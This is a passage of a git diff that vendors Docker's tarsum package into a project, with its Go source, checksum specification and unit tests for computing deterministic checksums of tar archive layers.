+ fileInfoSum{name: "file2", sum: "1abcdef1234567890", pos: 1}, + } +} + +func TestSortFileInfoSums(t *testing.T) { + dups := newFileInfoSums().GetAllFile("dup1") + if len(dups) != 2 { + t.Errorf("expected length 2, got %d", len(dups)) + } + dups.SortByNames() + if dups[0].Pos() != 4 { + t.Errorf("sorted dups should be ordered by position. Expected 4, got %d", dups[0].Pos()) + } + + fis := newFileInfoSums() + expected := "0abcdef1234567890" + fis.SortBySums() + got := fis[0].Sum() + if got != expected { + t.Errorf("Expected %q, got %q", expected, got) + } + + fis = newFileInfoSums() + expected = "dup1" + fis.SortByNames() + gotFis := fis[0] + if gotFis.Name() != expected { + t.Errorf("Expected %q, got %q", expected, gotFis.Name()) + } + // since a duplicate is first, ensure it is ordered first by position too + if gotFis.Pos() != 4 { + t.Errorf("Expected %d, got %d", 4, gotFis.Pos()) + } + + fis = newFileInfoSums() + fis.SortByPos() + if fis[0].Pos() != 0 { + t.Errorf("sorted fileInfoSums by Pos should order them by position.") + } + + fis = newFileInfoSums() + expected = "deadbeef1" + gotFileInfoSum := fis.GetFile("dup1") + if gotFileInfoSum.Sum() != expected { + t.Errorf("Expected %q, got %q", expected, gotFileInfoSum) + } + if fis.GetFile("noPresent") != nil { + t.Errorf("Should have return nil if name not found.") + } + +} diff --git a/vendor/github.com/docker/docker/pkg/tarsum/tarsum.go b/vendor/github.com/docker/docker/pkg/tarsum/tarsum.go new file mode 100644 index 0000000000..154788db82 --- /dev/null +++ b/vendor/github.com/docker/docker/pkg/tarsum/tarsum.go @@ -0,0 +1,295 @@ +// Package tarsum provides algorithms to perform checksum calculation on +// filesystem layers. +// +// The transportation of filesystems, regarding Docker, is done with tar(1) +// archives. There are a variety of tar serialization formats [2], and a key +// concern here is ensuring a repeatable checksum given a set of inputs from a +// generic tar archive. Types of transportation include distribution to and from a +// registry endpoint, saving and loading through commands or Docker daemon APIs, +// transferring the build context from client to Docker daemon, and committing the +// filesystem of a container to become an image. +// +// As tar archives are used for transit, but not preserved in many situations, the +// focus of the algorithm is to ensure the integrity of the preserved filesystem, +// while maintaining a deterministic accountability. This includes neither +// constraining the ordering or manipulation of the files during the creation or +// unpacking of the archive, nor include additional metadata state about the file +// system attributes. +package tarsum + +import ( + "archive/tar" + "bytes" + "compress/gzip" + "crypto" + "crypto/sha256" + "encoding/hex" + "errors" + "fmt" + "hash" + "io" + "path" + "strings" +) + +const ( + buf8K = 8 * 1024 + buf16K = 16 * 1024 + buf32K = 32 * 1024 +) + +// NewTarSum creates a new interface for calculating a fixed time checksum of a +// tar archive. +// +// This is used for calculating checksums of layers of an image, in some cases +// including the byte payload of the image's json metadata as well, and for +// calculating the checksums for buildcache. +func NewTarSum(r io.Reader, dc bool, v Version) (TarSum, error) { + return NewTarSumHash(r, dc, v, DefaultTHash) +} + +// NewTarSumHash creates a new TarSum, providing a THash to use rather than +// the DefaultTHash. +func NewTarSumHash(r io.Reader, dc bool, v Version, tHash THash) (TarSum, error) { + headerSelector, err := getTarHeaderSelector(v) + if err != nil { + return nil, err + } + ts := &tarSum{Reader: r, DisableCompression: dc, tarSumVersion: v, headerSelector: headerSelector, tHash: tHash} + err = ts.initTarSum() + return ts, err +} + +// NewTarSumForLabel creates a new TarSum using the provided TarSum version+hash label. +func NewTarSumForLabel(r io.Reader, disableCompression bool, label string) (TarSum, error) { + parts := strings.SplitN(label, "+", 2) + if len(parts) != 2 { + return nil, errors.New("tarsum label string should be of the form: {tarsum_version}+{hash_name}") + } + + versionName, hashName := parts[0], parts[1] + + version, ok := tarSumVersionsByName[versionName] + if !ok { + return nil, fmt.Errorf("unknown TarSum version name: %q", versionName) + } + + hashConfig, ok := standardHashConfigs[hashName] + if !ok { + return nil, fmt.Errorf("unknown TarSum hash name: %q", hashName) + } + + tHash := NewTHash(hashConfig.name, hashConfig.hash.New) + + return NewTarSumHash(r, disableCompression, version, tHash) +} + +// TarSum is the generic interface for calculating fixed time +// checksums of a tar archive. +type TarSum interface { + io.Reader + GetSums() FileInfoSums + Sum([]byte) string + Version() Version + Hash() THash +} + +// tarSum struct is the structure for a Version0 checksum calculation. +type tarSum struct { + io.Reader + tarR *tar.Reader + tarW *tar.Writer + writer writeCloseFlusher + bufTar *bytes.Buffer + bufWriter *bytes.Buffer + bufData []byte + h hash.Hash + tHash THash + sums FileInfoSums + fileCounter int64 + currentFile string + finished bool + first bool + DisableCompression bool // false by default. When false, the output gzip compressed. + tarSumVersion Version // this field is not exported so it can not be mutated during use + headerSelector tarHeaderSelector // handles selecting and ordering headers for files in the archive +} + +func (ts tarSum) Hash() THash { + return ts.tHash +} + +func (ts tarSum) Version() Version { + return ts.tarSumVersion +} + +// THash provides a hash.Hash type generator and its name. +type THash interface { + Hash() hash.Hash + Name() string +} + +// NewTHash is a convenience method for creating a THash. +func NewTHash(name string, h func() hash.Hash) THash { + return simpleTHash{n: name, h: h} +} + +type tHashConfig struct { + name string + hash crypto.Hash +} + +var ( + // NOTE: DO NOT include MD5 or SHA1, which are considered insecure. + standardHashConfigs = map[string]tHashConfig{ + "sha256": {name: "sha256", hash: crypto.SHA256}, + "sha512": {name: "sha512", hash: crypto.SHA512}, + } +) + +// DefaultTHash is default TarSum hashing algorithm - "sha256". +var DefaultTHash = NewTHash("sha256", sha256.New) + +type simpleTHash struct { + n string + h func() hash.Hash +} + +func (sth simpleTHash) Name() string { return sth.n } +func (sth simpleTHash) Hash() hash.Hash { return sth.h() } + +func (ts *tarSum) encodeHeader(h *tar.Header) error { + for _, elem := range ts.headerSelector.selectHeaders(h) { + if _, err := ts.h.Write([]byte(elem[0] + elem[1])); err != nil { + return err + } + } + return nil +} + +func (ts *tarSum) initTarSum() error { + ts.bufTar = bytes.NewBuffer([]byte{}) + ts.bufWriter = bytes.NewBuffer([]byte{}) + ts.tarR = tar.NewReader(ts.Reader) + ts.tarW = tar.NewWriter(ts.bufTar) + if !ts.DisableCompression { + ts.writer = gzip.NewWriter(ts.bufWriter) + } else { + ts.writer = &nopCloseFlusher{Writer: ts.bufWriter} + } + if ts.tHash == nil { + ts.tHash = DefaultTHash + } + ts.h = ts.tHash.Hash() + ts.h.Reset() + ts.first = true + ts.sums = FileInfoSums{} + return nil +} + +func (ts *tarSum) Read(buf []byte) (int, error) { + if ts.finished { + return ts.bufWriter.Read(buf) + } + if len(ts.bufData) < len(buf) { + switch { + case len(buf) <= buf8K: + ts.bufData = make([]byte, buf8K) + case len(buf) <= buf16K: + ts.bufData = make([]byte, buf16K) + case len(buf) <= buf32K: + ts.bufData = make([]byte, buf32K) + default: + ts.bufData = make([]byte, len(buf)) + } + } + buf2 := ts.bufData[:len(buf)] + + n, err := ts.tarR.Read(buf2) + if err != nil { + if err == io.EOF { + if _, err := ts.h.Write(buf2[:n]); err != nil { + return 0, err + } + if !ts.first { + ts.sums = append(ts.sums, fileInfoSum{name: ts.currentFile, sum: hex.EncodeToString(ts.h.Sum(nil)), pos: ts.fileCounter}) + ts.fileCounter++ + ts.h.Reset() + } else { + ts.first = false + } + + currentHeader, err := ts.tarR.Next() + if err != nil { + if err == io.EOF { + if err := ts.tarW.Close(); err != nil { + return 0, err + } + if _, err := io.Copy(ts.writer, ts.bufTar); err != nil { + return 0, err + } + if err := ts.writer.Close(); err != nil { + return 0, err + } + ts.finished = true + return n, nil + } + return n, err + } + ts.currentFile = path.Clean(currentHeader.Name) + if err := ts.encodeHeader(currentHeader); err != nil { + return 0, err + } + if err := ts.tarW.WriteHeader(currentHeader); err != nil { + return 0, err + } + if _, err := ts.tarW.Write(buf2[:n]); err != nil { + return 0, err + } + ts.tarW.Flush() + if _, err := io.Copy(ts.writer, ts.bufTar); err != nil { + return 0, err + } + ts.writer.Flush() + + return ts.bufWriter.Read(buf) + } + return n, err + } + + // Filling the hash buffer + if _, err = ts.h.Write(buf2[:n]); err != nil { + return 0, err + } + + // Filling the tar writer + if _, err = ts.tarW.Write(buf2[:n]); err != nil { + return 0, err + } + ts.tarW.Flush() + + // Filling the output writer + if _, err = io.Copy(ts.writer, ts.bufTar); err != nil { + return 0, err + } + ts.writer.Flush() + + return ts.bufWriter.Read(buf) +} + +func (ts *tarSum) Sum(extra []byte) string { + ts.sums.SortBySums() + h := ts.tHash.Hash() + if extra != nil { + h.Write(extra) + } + for _, fis := range ts.sums { + h.Write([]byte(fis.Sum())) + } + checksum := ts.Version().String() + "+" + ts.tHash.Name() + ":" + hex.EncodeToString(h.Sum(nil)) + return checksum +} + +func (ts *tarSum) GetSums() FileInfoSums { + return ts.sums +} diff --git a/vendor/github.com/docker/docker/pkg/tarsum/tarsum_spec.md b/vendor/github.com/docker/docker/pkg/tarsum/tarsum_spec.md new file mode 100644 index 0000000000..89b2e49f98 --- /dev/null +++ b/vendor/github.com/docker/docker/pkg/tarsum/tarsum_spec.md @@ -0,0 +1,230 @@ +page_title: TarSum checksum specification +page_description: Documentation for algorithms used in the TarSum checksum calculation +page_keywords: docker, checksum, validation, tarsum + +# TarSum Checksum Specification + +## Abstract + +This document describes the algorithms used in performing the TarSum checksum +calculation on filesystem layers, the need for this method over existing +methods, and the versioning of this calculation. + +## Warning + +This checksum algorithm is for best-effort comparison of file trees with fuzzy logic. + +This is _not_ a cryptographic attestation, and should not be considered secure. + +## Introduction + +The transportation of filesystems, regarding Docker, is done with tar(1) +archives. There are a variety of tar serialization formats [2], and a key +concern here is ensuring a repeatable checksum given a set of inputs from a +generic tar archive. Types of transportation include distribution to and from a +registry endpoint, saving and loading through commands or Docker daemon APIs, +transferring the build context from client to Docker daemon, and committing the +filesystem of a container to become an image. + +As tar archives are used for transit, but not preserved in many situations, the +focus of the algorithm is to ensure the integrity of the preserved filesystem, +while maintaining a deterministic accountability. This includes neither +constraining the ordering or manipulation of the files during the creation or +unpacking of the archive, nor include additional metadata state about the file +system attributes. + +## Intended Audience + +This document is outlining the methods used for consistent checksum calculation +for filesystems transported via tar archives. + +Auditing these methodologies is an open and iterative process. This document +should accommodate the review of source code. Ultimately, this document should +be the starting point of further refinements to the algorithm and its future +versions. + +## Concept + +The checksum mechanism must ensure the integrity and assurance of the +filesystem payload. + +## Checksum Algorithm Profile + +A checksum mechanism must define the following operations and attributes: + +* Associated hashing cipher - used to checksum each file payload and attribute + information. +* Checksum list - each file of the filesystem archive has its checksum + calculated from the payload and attributes of the file. The final checksum is + calculated from this list, with specific ordering. +* Version - as the algorithm adapts to requirements, there are behaviors of the + algorithm to manage by versioning. +* Archive being calculated - the tar archive having its checksum calculated + +## Elements of TarSum checksum + +The calculated sum output is a text string. The elements included in the output +of the calculated sum comprise the information needed for validation of the sum +(TarSum version and hashing cipher used) and the expected checksum in hexadecimal +form. + +There are two delimiters used: +* '+' separates TarSum version from hashing cipher +* ':' separates calculation mechanics from expected hash + +Example: + +``` + "tarsum.v1+sha256:220a60ecd4a3c32c282622a625a54db9ba0ff55b5ba9c29c7064a2bc358b6a3e" + | | \ | + | | \ | + |_version_|_cipher__|__ | + | \ | + |_calculation_mechanics_|______________________expected_sum_______________________| +``` + +## Versioning + +Versioning was introduced [0] to accommodate differences in calculation needed, +and ability to maintain reverse compatibility. + +The general algorithm will be describe further in the 'Calculation'. + +### Version0 + +This is the initial version of TarSum. + +Its element in the TarSum checksum string is `tarsum`. + +### Version1 + +Its element in the TarSum checksum is `tarsum.v1`. + +The notable changes in this version: +* Exclusion of file `mtime` from the file information headers, in each file + checksum calculation +* Inclusion of extended attributes (`xattrs`. Also seen as `SCHILY.xattr.` prefixed Pax + tar file info headers) keys and values in each file checksum calculation + +### VersionDev + +*Do not use unless validating refinements to the checksum algorithm* + +Its element in the TarSum checksum is `tarsum.dev`. + +This is a floating place holder for a next version and grounds for testing +changes. The methods used for calculation are subject to change without notice, +and this version is for testing and not for production use. + +## Ciphers + +The official default and standard hashing cipher used in the calculation mechanic +is `sha256`. This refers to SHA256 hash algorithm as defined in FIPS 180-4. + +Though the TarSum algorithm itself is not exclusively bound to the single +hashing cipher `sha256`, support for alternate hashing ciphers was later added +[1]. Use cases for alternate cipher could include future-proofing TarSum +checksum format and using faster cipher hashes for tar filesystem checksums. + +## Calculation + +### Requirement + +As mentioned earlier, the calculation is such that it takes into consideration +the lifecycle of the tar archive. In that the tar archive is not an immutable, +permanent artifact. Otherwise options like relying on a known hashing cipher +checksum of the archive itself would be reliable enough. The tar archive of the +filesystem is used as a transportation medium for Docker images, and the +archive is discarded once its contents are extracted. Therefore, for consistent +validation items such as order of files in the tar archive and time stamps are +subject to change once an image is received. + +### Process + +The method is typically iterative due to reading tar info headers from the +archive stream, though this is not a strict requirement. + +#### Files + +Each file in the tar archive have their contents (headers and body) checksummed +individually using the designated associated hashing cipher. The ordered +headers of the file are written to the checksum calculation first, and then the +payload of the file body. + +The resulting checksum of the file is appended to the list of file sums. The +sum is encoded as a string of the hexadecimal digest. Additionally, the file +name and position in the archive is kept as reference for special ordering. + +#### Headers + +The following headers are read, in this +order ( and the corresponding representation of its value): +* 'name' - string +* 'mode' - string of the base10 integer +* 'uid' - string of the integer +* 'gid' - string of the integer +* 'size' - string of the integer +* 'mtime' (_Version0 only_) - string of integer of the seconds since 1970-01-01 00:00:00 UTC +* 'typeflag' - string of the char +* 'linkname' - string +* 'uname' - string +* 'gname' - string +* 'devmajor' - string of the integer +* 'devminor' - string of the integer + +For >= Version1, the extended attribute headers ("SCHILY.xattr." prefixed pax +headers) included after the above list. These xattrs key/values are first +sorted by the keys. + +#### Header Format + +The ordered headers are written to the hash in the format of + + "{.key}{.value}" + +with no newline. + +#### Body + +After the order headers of the file have been added to the checksum for the +file, the body of the file is written to the hash. + +#### List of file sums + +The list of file sums is sorted by the string of the hexadecimal digest. + +If there are two files in the tar with matching paths, the order of occurrence +for that path is reflected for the sums of the corresponding file header and +body. + +#### Final Checksum + +Begin with a fresh or initial state of the associated hash cipher. If there is +additional payload to include in the TarSum calculation for the archive, it is +written first. Then each checksum from the ordered list of file sums is written +to the hash. + +The resulting digest is formatted per the Elements of TarSum checksum, +including the TarSum version, the associated hash cipher and the hexadecimal +encoded checksum digest. + +## Security Considerations + +The initial version of TarSum has undergone one update that could invalidate +handcrafted tar archives. The tar archive format supports appending of files +with same names as prior files in the archive. The latter file will clobber the +prior file of the same path. Due to this the algorithm now accounts for files +with matching paths, and orders the list of file sums accordingly [3]. + +## Footnotes + +* [0] Versioning https://github.com/docker/docker/commit/747f89cd327db9d50251b17797c4d825162226d0 +* [1] Alternate ciphers https://github.com/docker/docker/commit/4e9925d780665149b8bc940d5ba242ada1973c4e +* [2] Tar http://en.wikipedia.org/wiki/Tar_%28computing%29 +* [3] Name collision https://github.com/docker/docker/commit/c5e6362c53cbbc09ddbabd5a7323e04438b57d31 + +## Acknowledgments + +Joffrey F (shin-) and Guillaume J. Charmes (creack) on the initial work of the +TarSum calculation. + diff --git a/vendor/github.com/docker/docker/pkg/tarsum/tarsum_test.go b/vendor/github.com/docker/docker/pkg/tarsum/tarsum_test.go new file mode 100644 index 0000000000..86df0e2b89 --- /dev/null +++ b/vendor/github.com/docker/docker/pkg/tarsum/tarsum_test.go @@ -0,0 +1,664 @@ +package tarsum + +import ( + "archive/tar" + "bytes" + "compress/gzip" + "crypto/md5" + "crypto/rand" + "crypto/sha1" + "crypto/sha256" + "crypto/sha512" + "encoding/hex" + "fmt" + "io" + "io/ioutil" + "os" + "strings" + "testing" +) + +type testLayer struct { + filename string + options *sizedOptions + jsonfile string + gzip bool + tarsum string + version Version + hash THash +} + +var testLayers = []testLayer{ + { + filename: "testdata/46af0962ab5afeb5ce6740d4d91652e69206fc991fd5328c1a94d364ad00e457/layer.tar", + jsonfile: "testdata/46af0962ab5afeb5ce6740d4d91652e69206fc991fd5328c1a94d364ad00e457/json", + version: Version0, + tarsum: "tarsum+sha256:4095cc12fa5fdb1ab2760377e1cd0c4ecdd3e61b4f9b82319d96fcea6c9a41c6"}, + { + filename: "testdata/46af0962ab5afeb5ce6740d4d91652e69206fc991fd5328c1a94d364ad00e457/layer.tar", + jsonfile: "testdata/46af0962ab5afeb5ce6740d4d91652e69206fc991fd5328c1a94d364ad00e457/json", + version: VersionDev, + tarsum: "tarsum.dev+sha256:db56e35eec6ce65ba1588c20ba6b1ea23743b59e81fb6b7f358ccbde5580345c"}, + { + filename: "testdata/46af0962ab5afeb5ce6740d4d91652e69206fc991fd5328c1a94d364ad00e457/layer.tar", + jsonfile: "testdata/46af0962ab5afeb5ce6740d4d91652e69206fc991fd5328c1a94d364ad00e457/json", + gzip: true, + tarsum: "tarsum+sha256:4095cc12fa5fdb1ab2760377e1cd0c4ecdd3e61b4f9b82319d96fcea6c9a41c6"}, + { + // Tests existing version of TarSum when xattrs are present + filename: "testdata/xattr/layer.tar", + jsonfile: "testdata/xattr/json", + version: Version0, + tarsum: "tarsum+sha256:07e304a8dbcb215b37649fde1a699f8aeea47e60815707f1cdf4d55d25ff6ab4"}, + { + // Tests next version of TarSum when xattrs are present + filename: "testdata/xattr/layer.tar", + jsonfile: "testdata/xattr/json", + version: VersionDev, + tarsum: "tarsum.dev+sha256:6c58917892d77b3b357b0f9ad1e28e1f4ae4de3a8006bd3beb8beda214d8fd16"}, + { + filename: "testdata/511136ea3c5a64f264b78b5433614aec563103b4d4702f3ba7d4d2698e22c158/layer.tar", + jsonfile: "testdata/511136ea3c5a64f264b78b5433614aec563103b4d4702f3ba7d4d2698e22c158/json", + tarsum: "tarsum+sha256:c66bd5ec9f87b8f4c6135ca37684618f486a3dd1d113b138d0a177bfa39c2571"}, + { + options: &sizedOptions{1, 1024 * 1024, false, false}, // a 1mb file (in memory) + tarsum: "tarsum+sha256:8bf12d7e67c51ee2e8306cba569398b1b9f419969521a12ffb9d8875e8836738"}, + { + // this tar has two files with the same path + filename: "testdata/collision/collision-0.tar", + tarsum: "tarsum+sha256:08653904a68d3ab5c59e65ef58c49c1581caa3c34744f8d354b3f575ea04424a"}, + { + // this tar has the same two files (with the same path), but reversed order. ensuring is has different hash than above + filename: "testdata/collision/collision-1.tar", + tarsum: "tarsum+sha256:b51c13fbefe158b5ce420d2b930eef54c5cd55c50a2ee4abdddea8fa9f081e0d"}, + { + // this tar has newer of collider-0.tar, ensuring is has different hash + filename: "testdata/collision/collision-2.tar", + tarsum: "tarsum+sha256:381547080919bb82691e995508ae20ed33ce0f6948d41cafbeb70ce20c73ee8e"}, + { + // this tar has newer of collider-1.tar, ensuring is has different hash + filename: "testdata/collision/collision-3.tar", + tarsum: "tarsum+sha256:f886e431c08143164a676805205979cd8fa535dfcef714db5515650eea5a7c0f"}, + { + options: &sizedOptions{1, 1024 * 1024, false, false}, // a 1mb file (in memory) + tarsum: "tarsum+md5:0d7529ec7a8360155b48134b8e599f53", + hash: md5THash, + }, + { + options: &sizedOptions{1, 1024 * 1024, false, false}, // a 1mb file (in memory) + tarsum: "tarsum+sha1:f1fee39c5925807ff75ef1925e7a23be444ba4df", + hash: sha1Hash, + }, + { + options: &sizedOptions{1, 1024 * 1024, false, false}, // a 1mb file (in memory) + tarsum: "tarsum+sha224:6319390c0b061d639085d8748b14cd55f697cf9313805218b21cf61c", + hash: sha224Hash, + }, + { + options: &sizedOptions{1, 1024 * 1024, false, false}, // a 1mb file (in memory) + tarsum: "tarsum+sha384:a578ce3ce29a2ae03b8ed7c26f47d0f75b4fc849557c62454be4b5ffd66ba021e713b48ce71e947b43aab57afd5a7636", + hash: sha384Hash, + }, + { + options: &sizedOptions{1, 1024 * 1024, false, false}, // a 1mb file (in memory) + tarsum: "tarsum+sha512:e9bfb90ca5a4dfc93c46ee061a5cf9837de6d2fdf82544d6460d3147290aecfabf7b5e415b9b6e72db9b8941f149d5d69fb17a394cbfaf2eac523bd9eae21855", + hash: sha512Hash, + }, +} + +type sizedOptions struct { + num int64 + size int64 + isRand bool + realFile bool +} + +// make a tar: +// * num is the number of files the tar should have +// * size is the bytes per file +// * isRand is whether the contents of the files should be a random chunk (otherwise it's all zeros) +// * realFile will write to a TempFile, instead of an in memory buffer +func sizedTar(opts sizedOptions) io.Reader { + var ( + fh io.ReadWriter + err error + ) + if opts.realFile { + fh, err = ioutil.TempFile("", "tarsum") + if err != nil { + return nil + } + } else { + fh = bytes.NewBuffer([]byte{}) + } + tarW := tar.NewWriter(fh) + defer tarW.Close() + for i := int64(0); i < opts.num; i++ { + err := tarW.WriteHeader(&tar.Header{ + Name: fmt.Sprintf("/testdata%d", i), + Mode: 0755, + Uid: 0, + Gid: 0, + Size: opts.size, + }) + if err != nil { + return nil + } + var rBuf []byte + if opts.isRand { + rBuf = make([]byte, 8) + _, err = rand.Read(rBuf) + if err != nil { + return nil + } + } else { + rBuf = []byte{0, 0, 0, 0, 0, 0, 0, 0} + } + + for i := int64(0); i < opts.size/int64(8); i++ { + tarW.Write(rBuf) + } + } + return fh +} + +func emptyTarSum(gzip bool) (TarSum, error) { + reader, writer := io.Pipe() + tarWriter := tar.NewWriter(writer) + + // Immediately close tarWriter and write-end of the + // Pipe in a separate goroutine so we don't block. + go func() { + tarWriter.Close() + writer.Close() + }() + + return NewTarSum(reader, !gzip, Version0) +} + +// Test errors on NewTarsumForLabel +func TestNewTarSumForLabelInvalid(t *testing.T) { + reader := strings.NewReader("") + + if _, err := NewTarSumForLabel(reader, true, "invalidlabel"); err == nil { + t.Fatalf("Expected an error, got nothing.") + } + + if _, err := NewTarSumForLabel(reader, true, "invalid+sha256"); err == nil { + t.Fatalf("Expected an error, got nothing.") + } + if _, err := NewTarSumForLabel(reader, true, "tarsum.v1+invalid"); err == nil { + t.Fatalf("Expected an error, got nothing.") + } +} + +func TestNewTarSumForLabel(t *testing.T) { + + layer := testLayers[0] + + reader, err := os.Open(layer.filename) + if err != nil { + t.Fatal(err) + } + defer reader.Close() + + label := strings.Split(layer.tarsum, ":")[0] + ts, err := NewTarSumForLabel(reader, false, label) + if err != nil { + t.Fatal(err) + } + + // Make sure it actually worked by reading a little bit of it + nbByteToRead := 8 * 1024 + dBuf := make([]byte, nbByteToRead) + _, err = ts.Read(dBuf) + if err != nil { + t.Errorf("failed to read %vKB from %s: %s", nbByteToRead, layer.filename, err) + } +} + +// TestEmptyTar tests that tarsum does not fail to read an empty tar +// and correctly returns the hex digest of an empty hash. +func TestEmptyTar(t *testing.T) { + // Test without gzip. + ts, err := emptyTarSum(false) + if err != nil { + t.Fatal(err) + } + + zeroBlock := make([]byte, 1024) + buf := new(bytes.Buffer) + + n, err := io.Copy(buf, ts) + if err != nil { + t.Fatal(err) + } + + if n != int64(len(zeroBlock)) || !bytes.Equal(buf.Bytes(), zeroBlock) { + t.Fatalf("tarSum did not write the correct number of zeroed bytes: %d", n) + } + + expectedSum := ts.Version().String() + "+sha256:" + hex.EncodeToString(sha256.New().Sum(nil)) + resultSum := ts.Sum(nil) + + if resultSum != expectedSum { + t.Fatalf("expected [%s] but got [%s]", expectedSum, resultSum) + } + + // Test with gzip. + ts, err = emptyTarSum(true) + if err != nil { + t.Fatal(err) + } + buf.Reset() + + n, err = io.Copy(buf, ts) + if err != nil { + t.Fatal(err) + } + + bufgz := new(bytes.Buffer) + gz := gzip.NewWriter(bufgz) + n, err = io.Copy(gz, bytes.NewBuffer(zeroBlock)) + gz.Close() + gzBytes := bufgz.Bytes() + + if n != int64(len(zeroBlock)) || !bytes.Equal(buf.Bytes(), gzBytes) { + t.Fatalf("tarSum did not write the correct number of gzipped-zeroed bytes: %d", n) + } + + resultSum = ts.Sum(nil) + + if resultSum != expectedSum { + t.Fatalf("expected [%s] but got [%s]", expectedSum, resultSum) + } + + // Test without ever actually writing anything. + if ts, err = NewTarSum(bytes.NewReader([]byte{}), true, Version0); err != nil { + t.Fatal(err) + } + + resultSum = ts.Sum(nil) + + if resultSum != expectedSum { + t.Fatalf("expected [%s] but got [%s]", expectedSum, resultSum) + } +} + +var ( + md5THash = NewTHash("md5", md5.New) + sha1Hash = NewTHash("sha1", sha1.New) + sha224Hash = NewTHash("sha224", sha256.New224) + sha384Hash = NewTHash("sha384", sha512.New384) + sha512Hash = NewTHash("sha512", sha512.New) +) + +// Test all the build-in read size : buf8K, buf16K, buf32K and more +func TestTarSumsReadSize(t *testing.T) { + // Test always on the same layer (that is big enough) + layer := testLayers[0] + + for i := 0; i < 5; i++ { + + reader, err := os.Open(layer.filename) + if err != nil { + t.Fatal(err) + } + defer reader.Close() + + ts, err := NewTarSum(reader, false, layer.version) + if err != nil { + t.Fatal(err) + } + + // Read and discard bytes so that it populates sums + nbByteToRead := (i + 1) * 8 * 1024 + dBuf := make([]byte, nbByteToRead) + _, err = ts.Read(dBuf) + if err != nil { + t.Errorf("failed to read %vKB from %s: %s", nbByteToRead, layer.filename, err) + continue + } + } +} + +func TestTarSums(t *testing.T) { + for _, layer := range testLayers { + var ( + fh io.Reader + err error + ) + if len(layer.filename) > 0 { + fh, err = os.Open(layer.filename) + if err != nil { + t.Errorf("failed to open %s: %s", layer.filename, err) + continue + } + } else if layer.options != nil { + fh = sizedTar(*layer.options) + } else { + // What else is there to test? + t.Errorf("what to do with %#v", layer) + continue + } + if file, ok := fh.(*os.File); ok { + defer file.Close() + } + + var ts TarSum + if layer.hash == nil { + // double negatives! + ts, err = NewTarSum(fh, !layer.gzip, layer.version) + } else { + ts, err = NewTarSumHash(fh, !layer.gzip, layer.version, layer.hash) + } + if err != nil { + t.Errorf("%q :: %q", err, layer.filename) + continue + } + + // Read variable number of bytes to test dynamic buffer + dBuf := make([]byte, 1) + _, err = ts.Read(dBuf) + if err != nil { + t.Errorf("failed to read 1B from %s: %s", layer.filename, err) + continue + } + dBuf = make([]byte, 16*1024) + _, err = ts.Read(dBuf) + if err != nil { + t.Errorf("failed to read 16KB from %s: %s", layer.filename, err) + continue + } + + // Read and discard remaining bytes + _, err = io.Copy(ioutil.Discard, ts) + if err != nil { + t.Errorf("failed to copy from %s: %s", layer.filename, err) + continue + } + var gotSum string + if len(layer.jsonfile) > 0 { + jfh, err := os.Open(layer.jsonfile) + if err != nil { + t.Errorf("failed to open %s: %s", layer.jsonfile, err) + continue + } + defer jfh.Close() + + buf, err := ioutil.ReadAll(jfh) + if err != nil { + t.Errorf("failed to readAll %s: %s", layer.jsonfile, err) + continue + } + gotSum = ts.Sum(buf) + } else { + gotSum = ts.Sum(nil) + } + + if layer.tarsum != gotSum { + t.Errorf("expecting [%s], but got [%s]", layer.tarsum, gotSum) + } + var expectedHashName string + if layer.hash != nil { + expectedHashName = layer.hash.Name() + } else { + expectedHashName = DefaultTHash.Name() + } + if expectedHashName != ts.Hash().Name() { + t.Errorf("expecting hash [%v], but got [%s]", expectedHashName, ts.Hash().Name()) + } + } +} + +func TestIteration(t *testing.T) { + headerTests := []struct { + expectedSum string // TODO(vbatts) it would be nice to get individual sums of each + version Version + hdr *tar.Header + data []byte + }{ + { + "tarsum+sha256:626c4a2e9a467d65c33ae81f7f3dedd4de8ccaee72af73223c4bc4718cbc7bbd", + Version0, + &tar.Header{ + Name: "file.txt", + Size: 0, + Typeflag: tar.TypeReg, + Devminor: 0, + Devmajor: 0, + }, + []byte(""), + }, + { + "tarsum.dev+sha256:6ffd43a1573a9913325b4918e124ee982a99c0f3cba90fc032a65f5e20bdd465", + VersionDev, + &tar.Header{ + Name: "file.txt", + Size: 0, + Typeflag: tar.TypeReg, + Devminor: 0, + Devmajor: 0, + }, + []byte(""), + }, + { + "tarsum.dev+sha256:b38166c059e11fb77bef30bf16fba7584446e80fcc156ff46d47e36c5305d8ef", + VersionDev, + &tar.Header{ + Name: "another.txt", + Uid: 1000, + Gid: 1000, + Uname: "slartibartfast", + Gname: "users", + Size: 4, + Typeflag: tar.TypeReg, + Devminor: 0, + Devmajor: 0, + }, + []byte("test"), + }, + { + "tarsum.dev+sha256:4cc2e71ac5d31833ab2be9b4f7842a14ce595ec96a37af4ed08f87bc374228cd", + VersionDev, + &tar.Header{ + Name: "xattrs.txt", + Uid: 1000, + Gid: 1000, + Uname: "slartibartfast", + Gname: "users", + Size: 4, + Typeflag: tar.TypeReg, + Xattrs: map[string]string{ + "user.key1": "value1", + "user.key2": "value2", + }, + }, + []byte("test"), + }, + { + "tarsum.dev+sha256:65f4284fa32c0d4112dd93c3637697805866415b570587e4fd266af241503760", + VersionDev, + &tar.Header{ + Name: "xattrs.txt", + Uid: 1000, + Gid: 1000, + Uname: "slartibartfast", + Gname: "users", + Size: 4, + Typeflag: tar.TypeReg, + Xattrs: map[string]string{ + "user.KEY1": "value1", // adding different case to ensure different sum + "user.key2": "value2", + }, + }, + []byte("test"), + }, + { + "tarsum+sha256:c12bb6f1303a9ddbf4576c52da74973c00d14c109bcfa76b708d5da1154a07fa", + Version0, + &tar.Header{ + Name: "xattrs.txt", + Uid: 1000, + Gid: 1000, + Uname: "slartibartfast", + Gname: "users", + Size: 4, + Typeflag: tar.TypeReg, + Xattrs: map[string]string{ + "user.NOT": "CALCULATED", + }, + }, + []byte("test"), + }, + } + for _, htest := range headerTests { + s, err := renderSumForHeader(htest.version, htest.hdr, htest.data) + if err != nil { + t.Fatal(err) + } + + if s != htest.expectedSum { + t.Errorf("expected sum: %q, got: %q", htest.expectedSum, s) + } + } + +} + +func renderSumForHeader(v Version, h *tar.Header, data []byte) (string, error) { + buf := bytes.NewBuffer(nil) + // first build our test tar + tw := tar.NewWriter(buf) + if err := tw.WriteHeader(h); err != nil { + return "", err + } + if _, err := tw.Write(data); err != nil { + return "", err + } + tw.Close() + + ts, err := NewTarSum(buf, true, v) + if err != nil { + return "", err + } + tr := tar.NewReader(ts) + for { + hdr, err := tr.Next() + if hdr == nil || err == io.EOF { + // Signals the end of the archive. + break + } + if err != nil { + return "", err + } + if _, err = io.Copy(ioutil.Discard, tr); err != nil { + return "", err + } + } + return ts.Sum(nil), nil +} + +func 